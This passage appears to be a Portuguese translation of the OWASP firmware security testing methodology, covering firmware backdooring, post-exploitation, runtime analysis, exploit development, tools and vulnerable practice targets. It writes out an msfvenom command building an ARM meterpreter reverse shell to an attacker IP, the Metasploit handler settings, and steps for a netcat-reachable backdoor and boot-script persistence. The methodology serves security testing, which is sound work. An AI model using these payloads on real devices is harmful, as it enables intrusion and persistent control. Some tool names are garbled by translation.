7. Emule o backdoor usando chroot e QEMU
8. Conecte-se ao backdoor via netcat
9. Remova o binário QEMU dos rootfs de firmware extraídos
10. Reempacote o firmware modificado com FMK
11. Teste o firmware backdoor emulando com o kit de ferramentas de análise de firmware (FAT) e conectando-se ao IP e porta do backdoor de destino usando netcat
12. $$$$$$$$$$$$$

Se um shell raiz já tiver sido obtido por meio de análise dinâmica, manipulação do bootloader ou teste de segurança de hardware, tente executar binários maliciosos pré-compilados, como implantes ou shells reversos. Considere o uso de ferramentas automatizadas de carga/implante usadas para estruturas de comando e controle (C&C). Por exemplo, a estrutura Metasploit e 'msfvenom' podem ser aproveitados usando as etapas a seguir.

1. Identifique a arquitetura e o endianness do firmware de destino
2. Use msfvenom para especificar a carga alvo apropriada (-p), IP do host do invasor (LHOST=), número da porta de escuta (LPORT=), tipo de arquivo (-f), arquitetura (--arch), plataforma (--platform linux ou windows) e o arquivo de saída (-o). Por exemplo, msfvenom -p linux/armle/meterpreter_reverse_tcp LHOST=192.168.1.245 LPORT=4445 -f elf -o meterpreter_reverse_tcp --arch armle --platform linux
3. Transfira a carga para o dispositivo comprometido (por exemplo, execute um servidor web local e wget/curl a carga para o sistema de arquivos) e certifique-se de que a carga tenha permissões de execução
4. Prepare o Metasploit para lidar com solicitações recebidas. Por exemplo, inicie o Metasploit com msfconsole e use as seguintes configurações de acordo com a carga acima: use exploit/multi/handler,
   • set payload linux/armle/meterpreter_reverse_tcp
   • set LHOST 192.168.1.245 #attacker host IP
   • set LPORT 445 #can be any unused port
   • set ExitOnSession false
   • exploit -j -z
5. Execute o medidor reverso? no dispositivo comprometido
6. Assista às sessões do meterpreter abertas
7. Realizar atividades pós-exploração
8. $$$$$$$$$$$$$$$$

Se possível, identifique uma vulnerabilidade nos scripts de inicialização para obter acesso persistente a um dispositivo durante as reinicializações. Essas vulnerabilidades surgem quando os scripts de inicialização fazem referência, vinculam simbolicamente ou dependem de código localizado em locais montados não confiáveis, como cartões SD e volumes flash usados ​​para armazenamento de dados fora dos sistemas de arquivos raiz.

A análise de tempo de execução envolve a conexão a um processo ou binário em execução enquanto um dispositivo está sendo executado em seu ambiente normal ou emulado. As etapas básicas de análise de tempo de execução são fornecidas abaixo:

1. sudo chroot . ./qemu-arch -L <optionalLibPath> -g <gdb_port> <binary>
2. Anexe gdb-multiarch ou use IDA para emular o binário
3. Defina pontos de interrupção para funções identificadas durante a etapa 4, como memcpy, strncpy, strcmp, etc.
4. Execute grandes strings de carga útil para identificar estouros ou falhas de processo usando um fuzzer
5. Vá para a etapa 8 se uma vulnerabilidade for identificada

As ferramentas que podem ser úteis são (não exaustivas):

• gdb-multiarca
• Peda
• Frida
• rastreamento
• traço
• IDA Pro
• Ghidra
• Ninja Binário
• Funil

Depois de identificar uma vulnerabilidade em um binário nas etapas anteriores, é necessária uma prova de conceito (PoC) adequada para demonstrar o impacto e o risco no mundo real. O desenvolvimento de código de exploração requer experiência de programação em linguagens de nível inferior (por exemplo, ASM, C/C++, shellcode, etc.), bem como experiência na arquitetura alvo específica (por exemplo, MIPS, ARM, x86 etc.). O código PoC envolve a obtenção de execução arbitrária em um dispositivo ou aplicativo, controlando uma instrução na memória.

Não é comum que proteções binárias de tempo de execução (por exemplo, NX, DEP, ASLR, etc.) estejam em vigor em sistemas embarcados; no entanto, quando isso acontece, técnicas adicionais podem ser necessárias, como programação orientada a retorno (ROP). O ROP permite que um invasor implemente funcionalidades maliciosas arbitrárias encadeando o código existente no processo/código binário de destino conhecido como gadgets. Serão necessárias medidas para explorar uma vulnerabilidade identificada, como um buffer overflow, formando uma cadeia ROP. Uma ferramenta que pode ser útil para situações como essas é o localizador de gadgets da Capstone ou ROPGadget - https://github.com/JonathanSalwan/ROPgadget.

Utilize as seguintes referências para obter mais orientações:

• https://azeria-labs.com/writing-arm-shellcode/
• https://www.corelan.be/index.php/category/security/exploit-writing-tutorials/

Uma combinação de ferramentas será usada durante a avaliação do firmware. Listadas abaixo estão as ferramentas comumente usadas.

• Kit de ferramentas de comparação de análise de firmware (FACT)
• Analisador FW
• Firmwalker
• Kit de modificação de firmware
• Firmadyne
• Varredura de bytes
• Binwalk
• Flashrom
• Openocd
• Estrutura de análise binária Angr
• Ferramenta de análise binária
• Plataforma de análise binária
• BINSEC
• Checksec.sh
• CHIPSEC
• Motor Capstone
• Estrutura de emulação binária avançada Qiling
• Estrutura de análise binária dinâmica Triton (DBA)
• EMBA - O analisador de segurança de firmware

Para praticar a descoberta de vulnerabilidades no firmware, use os seguintes projetos de firmware vulneráveis ​​como ponto de partida.

• OWASP IoTGoat
  • https://github.com/OWASP/IoTGoat
• O maldito projeto de firmware de roteador vulnerável
  • https://github.com/praetorian-code/DVRF
• Maldito roteador ARM vulnerável (DVAR)
  • https://blog.exploitlab.net/2018/01/dvar-damn-vulnerable-arm-router.html
• ARM-X
  • https://github.com/therealsaumil/armx#downloads
• Azeria Labs VM 2.0
  • https://azeria-labs.com/lab-vm-2-0/
• Maldito dispositivo IoT vulnerável (DVID)
  • https://github.com/Vulcainreo/DVID

Feedback e contribuição

Se você gostaria de contribuir ou fornecer feedback para melhorar esta metodologia, entre em contato com [email protected] (@scriptingxss). Certifique-se de abrir um problema ou solicitação pull e nós cuidaremos disso!

Agradecimentos especiais aos nossos patrocinadores Cisco Meraki, OWASP Inland Empire e OWASP Los Angeles, bem como a José Alejandro Rivas Vidal por sua análise cuidadosa.

A lista completa de colaboradores pode ser encontrada em https://github.com/scriptingxss/owasp-fstm/graphs/contributors.

Licença

ATRIBUIÇÃO CRIATIVA COMMONS SHARE